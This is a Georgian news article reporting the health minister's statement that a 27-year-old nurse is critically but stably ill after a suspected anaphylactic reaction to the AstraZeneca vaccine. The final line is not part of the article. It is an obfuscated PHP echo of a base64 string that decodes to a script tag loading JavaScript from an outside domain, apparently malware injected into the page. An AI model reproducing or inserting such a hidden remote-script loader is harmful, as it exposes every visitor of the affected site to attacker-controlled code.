celsiusi
ავერსი საქკაბელი
პაციენტის მდგომარეობა შეფასებულია შოკის კლინიკით, მდგომარეობა არის სტაბილურად მძიმე, - ამის შესახებ ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ მედიასთან 27 წლის ექთნის მკურნალობის ტაქტიკასთან დაკავშირებით ექიმების კონსილიუმის დასრულების შემდეგ განაცხადა.
 
როგორც მინისტრმა აღნიშნა, მას უტარდება ყველა საჭირო კვლევა.
 
ეკატერინე ტიკარაძის თქმით, შემდეგი 24 საათი მნიშვნელოვანია დინამიკის განვითარების კუთხით.
 
„კონსილიუმს ესწრებოდა ექიმების სრული შემადგენლობა, მათ შორის იყო ექიმი, რომელმაც პაციენტს გაუწია ადგილზე პაციენტს საჭირო დახმარება. მისი მხრიდან მოვისმინეთ, თუ რა კონკრეტული ქმედებები იქნა განხორციელებული. პაციენტთან მიმართებაში. ამ ეტაპზე პაციენტის მდგომარეობა შეფასებულია შოკის კლინიკით, მდგომარეობა არის სტაბილურად მძიმე. უტარდება ყველა საჭირო კვლევა, რომელიც შემდგომში იქნება გათვალისწინებული მისთვის საჭირო მკურნალობის ტაქტიკის შემუშავებისთვის. ექიმებმა გარკვეულ ნაბიჯებზე მიიღეს გადაწყვეტილება, თუ როგორ იქნება შემდგომი ტაქტიკა.
 
როგორც გითხარით, მდგომარეობა არის კრიტიკულად მძიმეა, თუმცა არა უიმედო", - განაცხადა მინისტრმა.
 
შეგახსენებთ, რომ ახალციხის კლინიკაში 27 წლის ექთანს „ასტრაზენეკას“ ვაქცინის გაკეთების შემდეგ სავარაუდოდ, გვერდითი რეაქცია - ანაფილაქსიური რეაქცია დღეს დაუფიქსირდა. მისი ჯანმრთელობის მდგომარეობა მძიმეა. ექთანი, თბილისში, პირველ საუნივერსიტეტო კლინიკაში გადმოიყვანეს.
1425
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");